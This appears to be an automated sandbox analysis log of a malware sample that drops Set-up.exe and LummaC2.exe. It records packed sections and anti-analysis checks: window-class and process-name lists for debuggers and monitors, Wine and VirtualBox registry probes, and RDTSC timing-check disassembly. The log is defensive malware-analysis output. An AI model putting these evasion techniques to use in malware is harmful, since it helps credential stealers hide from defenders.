Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B57B9 pushad ; retf	2_3_007B58D9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4DA0 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4DA0 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4DA0 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B588C pushad ; retf	2_3_007B58D9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B588C pushad ; retf	2_3_007B58D9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4D04 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4D04 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4BE2 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4BE2 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4BE2 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B57B9 pushad ; retf	2_3_007B58D9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B57B9 pushad ; retf	2_3_007B58D9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4DA0 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4DA0 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B4DA0 pushad ; iretd	2_3_007B51F1
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B588C pushad ; retf	2_3_007B58D9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_007B588C pushad ; retf	2_3_007B58D9

Source: E205fJJS1Q.exe

Static PE information: section name: muzridtf entropy: 7.9544310264435145

Source: C:\Users\user\Desktop\E205fJJS1Q.exe	File created: C:\Users\user\AppData\Local\Temp\Set-up.exe			Jump to dropped file
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	File created: C:\Users\user\AppData\Local\Temp\LummaC2.exe			Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\E205fJJS1Q.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: PROCMON.EXE
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: X64DBG.EXE
Source: E205fJJS1Q.exe	Binary or memory string: SBIEDLL.DLL
Source: E205fJJS1Q.exe, 00000000.00000003.1673592712.0000000005820000.00000004.00001000.00020000.00000000.sdmp, E205fJJS1Q.exe, 00000000.00000002.1715411597.0000000000E12000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SBIEDLL.DLLN@
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WINDBG.EXE
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 14EE034 second address: 14EE038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 14EE038 second address: 14EE03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 14EE03E second address: 14ED929 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 stc 0x0000000a clc 0x0000000b push dword ptr [ebp+122D02C9h] 0x00000011 jng 00007F2274C039A0h 0x00000017 call dword ptr [ebp+122D2B84h] 0x0000001d pushad 0x0000001e jmp 00007F2274C039A8h 0x00000023 xor eax, eax 0x00000025 mov dword ptr [ebp+122D1C73h], edi 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f cmc 0x00000030 jmp 00007F2274C0399Ch 0x00000035 mov dword ptr [ebp+122D3585h], eax 0x0000003b pushad 0x0000003c mov ecx, dword ptr [ebp+122D3689h] 0x00000042 jp 00007F2274C039A9h 0x00000048 popad 0x00000049 mov esi, 0000003Ch 0x0000004e pushad 0x0000004f jmp 00007F2274C039A6h 0x00000054 mov dword ptr [ebp+122D1C73h], edx 0x0000005a popad 0x0000005b cld 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 mov dword ptr [ebp+122D3226h], edx 0x00000066 lodsw 0x00000068 jnl 00007F2274C03997h 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 mov dword ptr [ebp+122D1C73h], ecx 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c mov dword ptr [ebp+122D1C73h], ebx 0x00000082 nop 0x00000083 jmp 00007F2274C039A6h 0x00000088 push eax 0x00000089 jl 00007F2274C039ADh 0x0000008f push eax 0x00000090 push edx 0x00000091 jmp 00007F2274C0399Fh 0x00000096 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166345D second address: 1663463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166AE9B second address: 166AEA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166AEA3 second address: 166AEA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166B003 second address: 166B01D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2274C0399Ah 0x00000007 jnl 00007F2274C03996h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166B167 second address: 166B175 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F22757AEC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166B5BF second address: 166B5C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166E587 second address: 166E58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166E58B second address: 166E590 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166E6E8 second address: 166E72B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F22757AEC18h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sub edi, dword ptr [ebp+122D3495h] 0x00000028 push 00000000h 0x0000002a sub edi, dword ptr [ebp+122D1C73h] 0x00000030 push A9440C8Bh 0x00000035 jp 00007F22757AEC20h 0x0000003b push eax 0x0000003c push edx 0x0000003d push esi 0x0000003e pop esi 0x0000003f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166E72B second address: 166E787 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 56BBF3F5h 0x0000000d push 00000003h 0x0000000f or cx, C692h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F2274C03998h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 xor dword ptr [ebp+122D1C3Fh], ebx 0x00000036 mov dword ptr [ebp+122D1C67h], eax 0x0000003c push 00000003h 0x0000003e or ecx, dword ptr [ebp+122D3271h] 0x00000044 call 00007F2274C03999h 0x00000049 jl 00007F2274C039AAh 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166E787 second address: 166E7EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F22757AEC1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F22757AEC26h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jmp 00007F22757AEC1Ch 0x00000019 pushad 0x0000001a jmp 00007F22757AEC21h 0x0000001f jmp 00007F22757AEC1Bh 0x00000024 popad 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 jl 00007F22757AEC24h 0x0000002e pushad 0x0000002f ja 00007F22757AEC16h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166E7EF second address: 166E841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jmp 00007F2274C039A4h 0x0000000e pop eax 0x0000000f mov esi, 192E2825h 0x00000014 lea ebx, dword ptr [ebp+1245443Ch] 0x0000001a jmp 00007F2274C0399Ch 0x0000001f xchg eax, ebx 0x00000020 push esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F2274C039A9h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166E841 second address: 166E84D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166E8DA second address: 166E8F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2274C039A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166E8F0 second address: 166E8FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F22757AEC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166E8FA second address: 166E9A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2274C039A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jnc 00007F2274C039A2h 0x00000014 push 00000000h 0x00000016 jmp 00007F2274C0399Fh 0x0000001b push C1D48614h 0x00000020 jnl 00007F2274C039A3h 0x00000026 jmp 00007F2274C0399Dh 0x0000002b add dword ptr [esp], 3E2B7A6Ch 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F2274C03998h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D1C45h], ecx 0x00000052 push 00000003h 0x00000054 stc 0x00000055 push 00000000h 0x00000057 push 00000003h 0x00000059 call 00007F2274C0399Bh 0x0000005e or dword ptr [ebp+122D1C5Ah], esi 0x00000064 pop edx 0x00000065 push B1E0EA35h 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push edx 0x0000006f pop edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 166E9A0 second address: 166E9AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F22757AEC1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168FD7A second address: 168FDA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2274C0399Eh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F2274C039A4h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16542F6 second address: 16542FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16542FC second address: 1654300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1654300 second address: 1654312 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F22757AEC16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1654312 second address: 1654316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1654316 second address: 165431A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168DD95 second address: 168DD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168DD99 second address: 168DDC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F22757AEC28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F22757AEC16h 0x00000011 je 00007F22757AEC16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168DDC3 second address: 168DDD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F2274C03996h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168DDD5 second address: 168DDD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168DDD9 second address: 168DDFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2274C039A5h 0x00000007 jno 00007F2274C03996h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push edx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168DF67 second address: 168DF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168DF6B second address: 168DF73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168E21F second address: 168E227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168E38C second address: 168E397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2274C03996h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168E689 second address: 168E695 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F22757AEC16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168E97A second address: 168E988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2274C03996h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168E988 second address: 168E98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168E98E second address: 168E994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168EB11 second address: 168EB30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnc 00007F22757AEC16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F22757AEC20h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168EB30 second address: 168EB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F2274C03996h 0x0000000c popad 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2274C0399Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168EB50 second address: 168EB5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F22757AEC16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168EFD7 second address: 168EFE3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2274C03996h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168EFE3 second address: 168EFE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168EFE8 second address: 168EFF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2274C03996h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168EFF7 second address: 168F001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F22757AEC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168F677 second address: 168F67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168F7D2 second address: 168F7DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168F7DD second address: 168F7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 168F7E1 second address: 168F7EB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F22757AEC16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 165ACDB second address: 165ACE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 165ACE1 second address: 165AD17 instructions: 0x00000000 rdtsc 0x00000002 je 00007F22757AEC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F22757AEC29h 0x00000010 jmp 00007F22757AEC23h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jno 00007F22757AEC16h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 165AD17 second address: 165AD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16950B9 second address: 16950BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16950BF second address: 16950C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 16956DF second address: 16956E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F22757AEC1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 1697ACF second address: 1697AD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	RDTSC instruction interceptor: First address: 169CFEA second address: 169CFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
